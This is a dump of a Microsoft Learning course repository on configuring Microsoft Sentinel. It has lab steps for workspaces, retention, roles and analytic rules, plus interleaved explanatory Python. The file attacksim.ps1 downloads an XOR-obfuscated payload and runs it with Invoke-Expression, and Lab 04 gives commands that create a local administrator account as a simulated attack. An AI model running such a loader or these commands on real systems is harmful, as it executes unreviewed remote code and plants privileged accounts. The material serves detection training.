├── .github ├── PULL_REQUEST_TEMPLATE.md ├── ISSUE_TEMPLATE.md └── CONTRIBUTING.md ├── Instructions ├── Media │ ├── apl-5001-lab-diagrams-01.png │ ├── apl-5001-lab-diagrams-lab02.png │ ├── apl-5001-lab-diagrams-lab03.png │ └── apl-5001-lab-diagrams-lab04.png ├── Demos │ ├── DEMO_00_course_introduction.md │ ├── Ignite_2024_Lab_455-04.md │ ├── Ignite_2024_Lab_452-01.md │ ├── Ignite_2024_Lab_452-03.md │ ├── Ignite_2024_Lab_452-05.md │ ├── Ignite_2024_Lab_452-02.md │ ├── Ignite_2024_Lab_452-04.md │ ├── Ignite_2024_Lab_455-01.md │ ├── Ignite_2024_Lab_455-02.md │ ├── Ignite_2024_Lab_452-06.md │ └── Ignite_2024_Lab_455-03.md └── Labs │ ├── LAB_04_perform_analytic_rule_validation.md │ ├── LAB_01_create_microsoft_sentinel_workspace.md │ ├── LAB_03_validate-microsoft_sentinel_deploymnent.md │ └── LAB_02_deploy_microsoft_sentinel_content_hub_solution.md ├── Allfiles ├── Demos │ └── 01 │ │ └── azuredeploy.json ├── Labs │ └── 01 │ │ └── Starter │ │ └── azuredeploy.json ├── attacksim.ps1 ├── SC200_module7_ASIM_Parser_scripts.txt └── SC200_module4_KQL_scripts.txt ├── _config.yml ├── index.md ├── LICENSE ├── _build.yml └── readme.md /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # Module: 00 2 | ## Lab/Demo: 00 3 | 4 | Fixes # . 5 | 6 | Changes proposed in this pull request: 7 | 8 | - 9 | - 10 | - -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # Module: 00 2 | ## Lab/Demo: 00 3 | ### Task: 00 4 | #### Step: 00 5 | 6 | Description of issue 7 | 8 | Repro steps: 9 | 10 | 1. 11 | 1. 12 | 1. 
-------------------------------------------------------------------------------- /Instructions/Media/apl-5001-lab-diagrams-01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MicrosoftLearning/configure-siem-security-operations-using-microsoft-sentinel/HEAD/Instructions/Media/apl-5001-lab-diagrams-01.png -------------------------------------------------------------------------------- /Instructions/Media/apl-5001-lab-diagrams-lab02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MicrosoftLearning/configure-siem-security-operations-using-microsoft-sentinel/HEAD/Instructions/Media/apl-5001-lab-diagrams-lab02.png -------------------------------------------------------------------------------- /Instructions/Media/apl-5001-lab-diagrams-lab03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MicrosoftLearning/configure-siem-security-operations-using-microsoft-sentinel/HEAD/Instructions/Media/apl-5001-lab-diagrams-lab03.png -------------------------------------------------------------------------------- /Instructions/Media/apl-5001-lab-diagrams-lab04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MicrosoftLearning/configure-siem-security-operations-using-microsoft-sentinel/HEAD/Instructions/Media/apl-5001-lab-diagrams-lab04.png -------------------------------------------------------------------------------- /Allfiles/Demos/01/azuredeploy.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | }, 6 | "variables": { 7 | }, 8 | "resources": [ 9 | ], 10 | "outputs": { 11 | } 12 | } 
--------------------------------------------------------------------------------
/Allfiles/Labs/01/Starter/azuredeploy.json:
--------------------------------------------------------------------------------
{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
  },
  "variables": {
  },
  "resources": [
  ],
  "outputs": {
  }
}
--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
remote_theme: MicrosoftLearning/Jekyll-Theme
exclude:
  - readme.md
  - .github/
header_pages:
  - index.html
author: Microsoft Learning
twitter_username: mslearning
github_username: MicrosoftLearning
plugins:
  - jekyll-sitemap
  - jekyll-mentions
  - jemoji
markdown: kramdown
kramdown:
  syntax_highlighter_opts:
    disable : true
--------------------------------------------------------------------------------
/Allfiles/attacksim.ps1:
--------------------------------------------------------------------------------
# Force TLS 1.2 for the download below.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
# Repeating XOR key, as UTF-8 bytes.
$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
# Download the Base64-encoded, XOR-obfuscated simulation payload. If the content does not
# decode as-is (for example because it starts with a byte-order mark), retry after skipping
# the first three characters.
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;
Try { $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };
# XOR every byte with the key, cycling $i through the key bytes.
$i = 0;
$decryptedBytes = @();
$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i]; $i++; if ($i -eq $xor.Length) {$i = 0} };
# Decode the result as UTF-8 and run it in the current session.
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
--------------------------------------------------------------------------------
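The decode stage of attacksim.ps1 above can be reproduced statically, which is how an analyst inspects what a loader of this shape would run without executing it. The Python below is an added example, not a file from the repository: it applies the same Base64-then-repeating-XOR transform with the key the script uses, including the script's `Substring(3)` fallback, and stops before the `Invoke-Expression` step. The `encode_payload` helper, the `BOM_AS_TEXT` constant and the sample text they encode exist only to build constructed inputs; nothing is downloaded.

```python
import base64
import binascii

# Key from attacksim.ps1: the UTF-8 bytes of the string below (22 bytes).
XOR_KEY = "WinATP-Intro-Injection".encode("utf-8")

# The three characters a UTF-8 byte-order mark becomes when file bytes are read as
# Latin-1 text; used only to construct a sample that exercises the Substring(3) fallback.
BOM_AS_TEXT = "\xef\xbb\xbf"


def xor_with_repeating_key(data: bytes, key: bytes) -> bytes:
    """XOR each byte with key[i mod len(key)], mirroring the script's foreach loop that
    advances $i through the key and wraps it back to 0."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_payload(downloaded_text: str, key: bytes = XOR_KEY) -> str:
    """Static equivalent of the script's decode stage, without the Invoke-Expression.
    Mirrors its Try/Catch: decode the text as Base64; if that fails, retry from the
    fourth character (the script's $base64String.Substring(3))."""
    text = "".join(downloaded_text.split())  # .NET FromBase64String ignores whitespace
    try:
        raw = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):  # ValueError: non-ASCII characters in text
        raw = base64.b64decode(text[3:], validate=True)
    return xor_with_repeating_key(raw, key).decode("utf-8")


def encode_payload(script_text: str, key: bytes = XOR_KEY, bom_prefix: bool = False) -> str:
    """Inverse transform, used here only to build constructed inputs for decode_payload."""
    obfuscated = xor_with_repeating_key(script_text.encode("utf-8"), key)
    text = base64.b64encode(obfuscated).decode("ascii")
    return BOM_AS_TEXT + text if bom_prefix else text


if __name__ == "__main__":
    # Constructed, harmless sample standing in for the downloaded file's content.
    sample = encode_payload("Write-Host 'constructed sample'", bom_prefix=True)
    print("recovered script text:", decode_payload(sample))
```

Because the key is a fixed string embedded in the loader, the recovered text is fully determined by the downloaded content, so a detection or triage workflow can log the decoded script alongside the download URL instead of relying on what the session later executes.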
/index.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Online Hosted Instructions 3 | permalink: index.html 4 | layout: home 5 | --- 6 | 7 | # Content Directory 8 | 9 | Hyperlinks to each of the lab exercises and demos are listed below. 10 | 11 | ## Labs 12 | 13 | {% assign labs = site.pages | where_exp:"page", "page.url contains '/Instructions/Labs'" %} 14 | | Module | Lab | 15 | | --- | --- | 16 | {% for activity in labs %}| {{ activity.lab.module }} | [{{ activity.lab.title }}{% if activity.lab.type %} - {{ activity.lab.type }}{% endif %}]({{ site.github.url }}{{ activity.url }}) | 17 | {% endfor %} 18 | 19 | ## Demos 20 | 21 | {% assign demos = site.pages | where_exp:"page", "page.url contains '/Instructions/Demos'" %} 22 | | Module | Demo | 23 | | --- | --- | 24 | {% for activity in demos %}| {{ activity.demo.module }} | [{{ activity.demo.title }}]({{ site.github.url }}{{ activity.url }}) | 25 | {% endfor %} 26 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Sidney Andrews 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /_build.yml: -------------------------------------------------------------------------------- 1 | name: '$(Date:yyyyMMdd)$(Rev:.rr)' 2 | jobs: 3 | - job: build_markdown_content 4 | displayName: 'Build Markdown Content' 5 | workspace: 6 | clean: all 7 | pool: 8 | vmImage: 'Ubuntu 16.04' 9 | container: 10 | image: 'microsoftlearning/markdown-build:latest' 11 | steps: 12 | - task: Bash@3 13 | displayName: 'Build Content' 14 | inputs: 15 | targetType: inline 16 | script: | 17 | cp /{attribution.md,template.docx,package.json,package.js} . 
18 | npm install 19 | node package.js --version $(Build.BuildNumber) 20 | - task: GitHubRelease@0 21 | displayName: 'Create GitHub Release' 22 | inputs: 23 | gitHubConnection: 'github-microsoftlearning-organization' 24 | repositoryName: '$(Build.Repository.Name)' 25 | tagSource: manual 26 | tag: 'v$(Build.BuildNumber)' 27 | title: 'Version $(Build.BuildNumber)' 28 | releaseNotesSource: input 29 | releaseNotes: '# Version $(Build.BuildNumber) Release' 30 | assets: '$(Build.SourcesDirectory)/out/*.zip' 31 | assetUploadMode: replace 32 | - task: PublishBuildArtifacts@1 33 | displayName: 'Publish Output Files' 34 | inputs: 35 | pathtoPublish: '$(Build.SourcesDirectory)/out/' 36 | artifactName: 'Lab Files' 37 | -------------------------------------------------------------------------------- /Instructions/Demos/DEMO_00_course_introduction.md: -------------------------------------------------------------------------------- 1 | --- 2 | demo: 3 | title: 'Demonstration 00: Student materials and lab environment (adjust)' 4 | module: 'Guided Project - Configure SIEM Security Operations with Microsoft Sentinel' 5 | --- 6 | ## Demonstration - Student materials and lab environment (optional) 7 | 8 | Use this demonstration to show students how to access the lab environment and student materials. You can do this at the beginning of class or before the next demonstration. 9 | 10 | ## Show students the lab environment (adjust for your lab hoster) 11 | 12 | - Discuss how students access the lab environment. 13 | 14 | - Explain how to sign-in to the virtual machine host. 15 | 16 | - Explain how to access the [Azure portal](https://portal.azure.com). It is preferred to open the Azure portal in the lab environment instead of a separate window. Ask for a show of hands on how many students have used the portal. 17 | 18 | - Explain what resources, if any, have already been configured for the labs. 19 | 20 | - Review how to use the lab instructions. 
21 | 22 | - Add other topics specific to your lab hosting environment. 23 | 24 | ## Show students their course materials. 25 | 26 | - Access the [Microsoft Learn page](https://learn.microsoft.com). 27 | 28 | - Discuss that Microsoft Learn is a great source for all Azure documentation, training, certifications, and assessments. 29 | 30 | - Select **Learning Paths** and then search for the **Configure SIEM security operations using Microsoft Sentinel** learning path. 31 | 32 | - Discuss that the content in the learning path is specific to this course. There is more storage content they can review. 33 | 34 | - Explain the content is reference material and there isn't a 1:1 mapping with the classroom presentations. 35 | 36 | - Discuss that each of these modules may have additional hands-on activities. You will identify these activities as the course progresses. 37 | 38 | - Ask the students to locate and bookmark the learning path. 39 | -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # Configure SIEM security operations using Microsoft Sentinel 2 | 3 | - **[Link to labs (HTML format)]( https://microsoftlearning.github.io/configure-siem-security-operations-using-microsoft-sentinel/)** 4 | 5 | - **Are you an MCT?** - Have a look at our [GitHub User Guide for MCTs](https://microsoftlearning.github.io/MCT-User-Guide/) 6 | 7 | ## What are we doing? 8 | 9 | - To support this course, we'll make frequent updates to the course content to keep it current with the Microsoft services used in the course. We're publishing the lab instructions and lab files on GitHub to allow for open contributions between the course authors and MCTs (Microsoft Certified Trainer) to keep the content current with product changes. 
10 | 11 | - We hope this brings a sense of collaboration to the labs like we have never had before - when a Microsoft service such as Azure or Microsoft 365 changes and you find it first during a live delivery, go ahead and make an enhancement right in the lab source. Help your fellow MCTs. 12 | 13 | ## How should I use this repository? 14 | 15 | - The instructor materials are your primary source for teaching the course content. 16 | 17 | - These files on GitHub are designed to be used in the course labs, which use the hosted lab environment. 18 | 19 | - It's recommended that for every delivery, trainers check GitHub for any changes that may have been made to support the latest Microsoft cloud services and get the latest files for their delivery. 20 | 21 | ## What about changes to the student handbook? 22 | 23 | - If a student handbook is provided, we'll review the student handbook on a quarterly basis and update through the normal MOC (Microsoft Official Curriculum) release channels as needed. 24 | 25 | ## How do I contribute? 26 | 27 | - Any MCT (Microsoft Certified Trainer) can submit a pull request to the code or content in the GitHub repro. Microsoft and the course author will then triage and include content and lab code changes as needed. 28 | 29 | - You can submit bugs, changes, improvement, and ideas. Find a new Azure or Microsoft 365 feature before we have? Submit a new demo! 30 | -------------------------------------------------------------------------------- /.github/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing to Microsoft Learning Repositories 2 | 3 | MCT contributions are a key part of keeping the lab and demo content current as the Azure platform changes. We want to make it as easy as possible for you to contribute changes to the lab files. Here are a few guidelines to keep in mind as you contribute changes. 
4 | 5 | ## GitHub Use & Purpose 6 | 7 | Microsoft Learning is using GitHub to publish the lab steps and lab scripts for courses that cover cloud services like Azure. Using GitHub allows the course’s authors and MCTs to keep the lab content current with Azure platform changes. Using GitHub allows the MCTs to provide feedback and suggestions for lab changes, and then the course authors can update lab steps and scripts quickly and relatively easily. 8 | 9 | > When you prepare to teach these courses, you should ensure that you are using the latest lab steps and scripts by downloading the appropriate files from GitHub. GitHub should not be used to discuss technical content in the course, or how to prep. It should only be used to address changes in the labs. 10 | 11 | It is strongly recommended that MCTs and Partners access these materials and in turn, provide them separately to students. Pointing students directly to GitHub to access Lab steps as part of an ongoing class will require them to access yet another UI as part of the course, contributing to a confusing experience for the student. An explanation to the student regarding why they are receiving separate Lab instructions can highlight the nature of an always-changing cloud-based interface and platform. Microsoft Learning support for accessing files on GitHub and support for navigation of the GitHub site is limited to MCTs teaching this course only. 12 | 13 | > As an alternative to pointing students directly to the GitHub repository, you can point students to the GitHub Pages website to view the lab instructions. The URL for the GitHub Pages website can be found at the top of the repository. 14 | 15 | To address general comments about the course and demos, or how to prepare for a course delivery, please use the existing MCT forums. 16 | 17 | ## Additional Resources 18 | 19 | A user guide has been provided for MCTs who are new to GitHub. 
It provides steps for connecting to GitHub, downloading and printing course materials, updating the scripts that students use in labs, and explaining how you can help ensure that this course’s content remains current.

--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_455-04.md:
--------------------------------------------------------------------------------
---
lab:
    title: 'Exercise 4 - Mitigate threats using Microsoft Defender for Cloud'
    module: 'Explore Governance Rules'
---

# Exercise 4 - Explore Governance Rules

## Lab scenario

Governance rules can identify resources that require remediation according to specific recommendations or severities. Microsoft Defender for Cloud continuously assesses your hybrid and multi-cloud workloads and provides you with recommendations to harden your assets and enhance your security posture. Central security teams often experience challenges when driving the personnel within their organizations to implement recommendations. A governance rule assigns an owner and due date to ensure the recommendations are handled. Many governance rules can apply to the same recommendations, so the rule with the lower priority value is the one that assigns the owner and due date. Governance rules will help:

- Security teams: Set accountability for recommendations, track their progress, and drive resource owners to action with notification capabilities.
- Workload owners: Focus on the specific recommendations that require their attention. They'll also be able to delegate recommendations to others or set expectations for when the recommendations will be implemented.

### Task 1: Assign Governance Rule

1. Under Cloud Security, select Security posture from the left menu items.

1. The Secure score defaults to the Azure environment.

1. Under the Environment tab, select the View recommendations > link.

1. Select Add filter and then select Resource type.

1. Select the **Virtual machine** checkbox and then select the **Apply** button.

1. Select any recommendation where the status isn’t “Completed”.

1. Review the recommendation and, in the Take action tab, scroll down to Delegate and select Assign owner & set due date.

1. In the Create assignment window, leave Type set to Defender for Cloud and expand the Assignment details.

1. In the Set owner Email address box, type in your admin email. Hint: You can copy it from the instructions in the Resources tab.

1. Explore the Set remediation timeframe and Set email notifications options and select Create.

>**Note:** If you see the error Failed to create requested assignments, try again later.

1. Close the recommendation page by selecting the ‘X’ on the upper right of the window.

## You have completed the lab

--------------------------------------------------------------------------------
/Instructions/Demos/Ignite_2024_Lab_452-01.md:
--------------------------------------------------------------------------------
---
lab:
    title: 'Exercise 01: Deploy Microsoft Sentinel'
    module: 'Guided Project - Create and configure a Microsoft Sentinel workspace'
---

## Exercise overview

You are a Security Operations Architect working at a company that is implementing Microsoft Sentinel. You are responsible for setting up the Microsoft Sentinel environment to meet the company requirements to minimize cost, meet compliance regulations, and provide the most manageable environment for your security team to perform their daily job responsibilities.
Your first task is to deploy a Microsoft Sentinel workspace. The solution must meet the following requirements:

- Ensure Sentinel data is stored in the West US Azure region.
- Ensure that all Sentinel analytics logs are retained for 180 days.
- Assign roles to Operator1 to ensure that Operator1 can manage incidents and run Sentinel playbooks. The solution must meet the principle of least privilege.

## Exercise instructions

### Task 1 - Create a Log Analytics workspace

Create a Log Analytics workspace, including the region option. Learn more about [onboarding Microsoft Sentinel](https://learn.microsoft.com/azure/sentinel/quickstart-onboard).

1. In the Microsoft Edge browser, navigate to the Azure portal at .

>**Note:** Select the **Resources** tab for the *Username* and *Password* for the lab. Use the **** account for this lab.

1. In the **Sign in** dialog box, copy and paste in the tenant Email account for the admin username provided by your lab hosting provider and then select **Next**.

1. In the **Enter password** dialog box, copy and paste in the admin's tenant password provided by your lab hosting provider and then select **Sign in**.

1. In the Search bar of the Azure portal, type "Microsoft Sentinel", then select

1. Select **+ Create**.

1. Select **Create a new workspace**.

1. Select "RG2" as the Resource Group.

1. Enter a unique name for the Log Analytics workspace.

1. Select "West US" as the region for the workspace.

1. Select **Review + create** to validate the new workspace.

1. Select **Create** to deploy the workspace.

### Task 2 - Deploy Microsoft Sentinel to a workspace

Deploy Microsoft Sentinel to the workspace.

1. When the workspace deployment completes, select **Refresh** to display the new workspace.

1. Select the workspace you want to add Sentinel to (created in Task 1).

1. Select **Add**.

### Task 3 - Configure data retention

1. In the Microsoft Azure "breadcrumb" menu, select **Home**.

1. In the Search bar of the Azure portal, type "Log Analytics" and select the workspace created in Task 1.

1. Expand the *Settings* section in the navigation menu and select **Usage and estimated costs**.

1. Select **Data retention**.

1. Change the data retention period to **180 days**.

1. Select **OK**.

## Proceed to Exercise 2

--------------------------------------------------------------------------------
/Instructions/Labs/LAB_04_perform_analytic_rule_validation.md:
--------------------------------------------------------------------------------
---
lab:
    title: 'Exercise 04: Perform simulated attack'
    module: 'Guided Project - Perform a simulated attack to validate Analytic and Automation rules'
---

>**Note**: This lab builds on Labs 01, 02 and 03. To complete this lab, you will need an [Azure subscription](https://azure.microsoft.com/free/?azure-portal=true) in which you have administrative access.

## General guidelines

- When creating objects, use the default settings unless there are requirements that require different configurations.
- Only create, delete, or modify objects to achieve the stated requirements. Unnecessary changes to the environment may adversely affect your final score.
- If there are multiple approaches to achieving a goal, always choose the approach that requires the least amount of administrative effort.

We need to validate that our Microsoft Sentinel deployment is receiving security events and creating incidents from virtual machines that run Windows.

## Architecture diagram

![Diagram of simulated attack](../Media/apl-5001-lab-diagrams-lab04.png)

## Skilling tasks

You need to perform a simulated attack to validate that the Analytic and Automation rules create an incident and assign it to `Operator1`. You will perform a simple `Privilege Escalation` attack on `vm1`.
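The NRT analytic rule and automation rule this exercise validates are the ones defined in LAB_03 on this page (the KQL filter on `EventID == 4732` and `TargetAccount == "Builtin\\Administrators"`, the `Privilege Escalation` tactic, and the `Assign owner` action for `Operator1`). The Python below is an added example, not part of the lab files: it runs that same logic over constructed SecurityEvent-style records so the expected incident can be reasoned about before looking at the portal. The record values, the rule name, the severity and the optional analytic-rule-name condition on the automation rule are assumptions made for this example.

```python
# Added example (not part of the lab files): a Python model of the Lab 03 NRT rule and
# automation rule applied to the events the Lab 04 simulated attack produces.

# Constructed SecurityEvent-style records (not real telemetry). Column names follow the
# Sentinel SecurityEvent table used by the lab's KQL (EventID, TargetAccount).
SAMPLE_EVENTS = [
    # 4720: user account created (net user theusernametoadd /add); not what the rule looks for
    {"TimeGenerated": "2024-11-19T10:00:01Z", "Computer": "vm1", "EventID": 4720,
     "SubjectAccount": r"VM1\labadmin", "TargetAccount": r"VM1\theusernametoadd"},
    # 4732: member added to a security-enabled local group; the local Administrators
    # group is reported as Builtin\Administrators (net localgroup administrators ... /add)
    {"TimeGenerated": "2024-11-19T10:00:02Z", "Computer": "vm1", "EventID": 4732,
     "SubjectAccount": r"VM1\labadmin", "TargetAccount": r"Builtin\Administrators",
     "MemberName": r"VM1\theusernametoadd"},
    # 4732 into a different local group; must not fire
    {"TimeGenerated": "2024-11-19T10:05:00Z", "Computer": "vm1", "EventID": 4732,
     "SubjectAccount": r"VM1\labadmin", "TargetAccount": r"Builtin\Remote Desktop Users",
     "MemberName": r"VM1\theusernametoadd"},
    # Same group in a different case; KQL == is case-sensitive, so the lab query would
    # not match this either (=~ would)
    {"TimeGenerated": "2024-11-19T10:06:00Z", "Computer": "vm1", "EventID": 4732,
     "SubjectAccount": r"VM1\labadmin", "TargetAccount": r"builtin\administrators",
     "MemberName": r"VM1\someoneelse"},
]

ADMIN_GROUP = r"Builtin\Administrators"  # the KQL literal "Builtin\\Administrators"


def nrt_rule_query(events):
    """Python equivalent of the lab's NRT rule query:
         SecurityEvent
         | where EventID == 4732
         | where TargetAccount == "Builtin\\Administrators"
    Both comparisons are exact (case-sensitive), as KQL == is."""
    return [e for e in events
            if e.get("EventID") == 4732 and e.get("TargetAccount") == ADMIN_GROUP]


def create_incident(rule_name, severity, tactics, matched_events):
    """Incident shape as the lab verifies it: Title and Severity from the rule, Tactics
    from the rule's Tactics and techniques setting, Owner unset until automation runs."""
    return {"Title": rule_name, "Severity": severity, "Tactics": list(tactics),
            "AnalyticRule": rule_name, "Owner": None, "Events": list(matched_events)}


def automation_rule_assign_owner(incident, owner="Operator1", analytic_rule_name=None):
    """Model of the Lab 03 automation rule (action: Assign owner). The lab's steps add no
    condition, so the rule applies to every incident; analytic_rule_name is an assumed
    optional condition that restricts it to incidents from one rule."""
    if analytic_rule_name is not None and incident["AnalyticRule"] != analytic_rule_name:
        return incident
    incident["Owner"] = owner
    return incident


def run_pipeline(events, rule_name="Member added to local Administrators", severity="Medium"):
    """Rule evaluation, then incident creation, then automation, for one batch of events.
    Returns None when the rule does not match, as no incident would be created."""
    matches = nrt_rule_query(events)
    if not matches:
        return None
    incident = create_incident(rule_name, severity, ["Privilege Escalation"], matches)
    return automation_rule_assign_owner(incident, owner="Operator1")


if __name__ == "__main__":
    result = run_pipeline(SAMPLE_EVENTS)
    print(f"Incident: {result['Title']} | Severity {result['Severity']} | "
          f"Owner {result['Owner']} | Tactics {result['Tactics']} | "
          f"{len(result['Events'])} event(s), member {result['Events'][0]['MemberName']}")
```

The third and fourth records show why the rule fires exactly once for the lab's three `net` commands: only the `net localgroup administrators ... /add` step produces a 4732 whose `TargetAccount` equals the literal in the query, and the comparison the lab uses is exact, so a rule that should also catch differently-cased group names would need `=~` instead of `==`.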

## Exercise instructions

### Task 1 - Perform a simulated Privilege Escalation attack

Use simulated attacks to test analytic rules in Microsoft Sentinel. Learn more about [privilege escalation attack simulation](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md).

1. Locate and select the **vm1** virtual machine in Azure, scroll down the menu items to **Operations**, and select **Run command**
1. On the **Run command** pane, select **RunPowerShellScript**
1. Copy the commands below, which simulate the creation of an Admin account, into the `PowerShell Script` form and select **Run**

```CommandPrompt
net user theusernametoadd /add
net user theusernametoadd ThePassword1!
net localgroup administrators theusernametoadd /add
```

>**Note**: Make sure there is only one command per line. You can rerun the commands by changing the username.

1. In the `Output` window you should see `The command completed successfully` three times

### Task 2 - Verify an incident is created from the simulated attack

Verify that an incident is created that matches the criteria for the analytic rule and automation. Learn more about [Microsoft Sentinel incident management](https://learn.microsoft.com/azure/sentinel/incident-investigation).

1. In `Microsoft Sentinel`, go to the `Threat management` menu section and select **Incidents**
1. You should see an incident that matches the `Severity` and `Title` you configured in the `NRT` rule you created
1. Select the `Incident` and the `detail` pane opens
1. The `Owner` assignment should be **Operator1**, created from the `Automation rule`, and the `Tactics and techniques` should be **Privilege Escalation** (from the `NRT` rule)
1. Select **View full details** to see all the `Incident management` capabilities and `Incident actions`

--------------------------------------------------------------------------------
/Instructions/Labs/LAB_01_create_microsoft_sentinel_workspace.md:
--------------------------------------------------------------------------------
---
lab:
    title: 'Exercise 01: Deploy Microsoft Sentinel'
    module: 'Guided Project - Create and configure a Microsoft Sentinel workspace'
---

>**Note**: To complete this lab, you will need an [Azure subscription](https://azure.microsoft.com/en-us/free/?azure-portal=true) in which you have administrative access.

## General guidelines

- When creating objects, use the default settings unless there are requirements that require different configurations.
- Only create, delete, or modify objects to achieve the stated requirements. Unnecessary changes to the environment may adversely affect your final score.
- If there are multiple approaches to achieving a goal, always choose the approach that requires the least amount of administrative effort.

We are currently evaluating the existing security posture of our corporate environment. We need your help in setting up a security information and event management (SIEM) solution to help identify future and ongoing cyber-attacks.

## Architecture diagram

![Diagram with Log Analytics workspace.](../Media/apl-5001-lab-diagrams-01.png)

## Skilling tasks

You need to deploy a Microsoft Sentinel workspace. The solution must meet the following requirements:

- Ensure Sentinel data is stored in the West US Azure region.
- Ensure that all Sentinel analytics logs are retained for 180 days.
- Assign roles to Operator1 to ensure that Operator1 can manage incidents and run Sentinel playbooks. The solution must meet the principle of least privilege.

## Exercise instructions

### Task 1 - Create a Log Analytics workspace

Create a Log Analytics workspace, including the region option. Learn more about [onboarding Microsoft Sentinel](https://learn.microsoft.com/azure/sentinel/quickstart-onboard).

1. In the Azure portal, search for and select `Microsoft Sentinel`.
1. Select **+ Create**.
1. Select **Create a new workspace**.
1. Select `RG2` as the Resource Group.
1. Enter a valid name for the Log Analytics workspace.
1. Select `West US` as the region for the workspace.
1. Select **Review + create** to validate the new workspace.
1. Select **Create** to deploy the workspace.

### Task 2 - Deploy Microsoft Sentinel to a workspace

Deploy Microsoft Sentinel to the workspace.

1. When the `workspace` deployment completes, select **Refresh** to display the new `workspace`.
1. Select the `workspace` you want to add Sentinel to (created in Task 1).
1. Select **Add**.

### Task 3 - Assign a Microsoft Sentinel role to a user

Assign a Microsoft Sentinel role to a user. Learn more about [Roles and permissions for working in Microsoft Sentinel](https://learn.microsoft.com/azure/sentinel/roles).

1. Go to the Resource group RG2.
1. Select **Access control (IAM)**.
1. Select **Add** and `Add role assignment`.
1. In the search bar, search for and select the `Microsoft Sentinel Contributor` role.
1. Select **Next**.
1. Select the option `User, group, or service principal`.
1. Select **+ Select members**.
1. Search for the `Operator1` assigned in your lab instructions `(operator1-XXXXXXXXX@LODSPRODMCA.onmicrosoft.com)`.
1. Select the `user icon`.
1. Select **Select**.
1. Select “Review + assign”.
1. Select “Review + assign”.

### Task 4 - Configure data retention

Configure data retention. [Learn more about data retention](https://learn.microsoft.com/azure/azure-monitor/logs/data-retention-archive).

1. Go to the `Log Analytics workspace` created in Task 1 step 5.
1. Select **Usage and estimated costs**.
1. Select **Data retention**.
1. Change the data retention period to **180 days**.
1. Select **OK**.

>**Note**: For additional practice complete the [Create and manage Microsoft Sentinel workspaces](https://learn.microsoft.com/training/modules/create-manage-azure-sentinel-workspaces/) module.

--------------------------------------------------------------------------------
/Instructions/Labs/LAB_03_validate-microsoft_sentinel_deploymnent.md:
--------------------------------------------------------------------------------
---
lab:
    title: 'Exercise 03: Validate the Sentinel Deployment'
    module: 'Guided Project - Configure Microsoft Sentinel Data Collection rules, NRT Analytic rule and Automation'
---

>**Note**: This lab builds on Lab 01 and Lab 02. To complete this lab, you will need an [Azure subscription](https://azure.microsoft.com/free/?azure-portal=true) in which you have administrative access.

## General guidelines

- When creating objects, use the default settings unless there are requirements that require different configurations.
- Only create, delete, or modify objects to achieve the stated requirements. Unnecessary changes to the environment may adversely affect your final score.
- If there are multiple approaches to achieving a goal, always choose the approach that requires the least amount of administrative effort.

We need to configure Microsoft Sentinel to receive security events from virtual machines that run Windows.
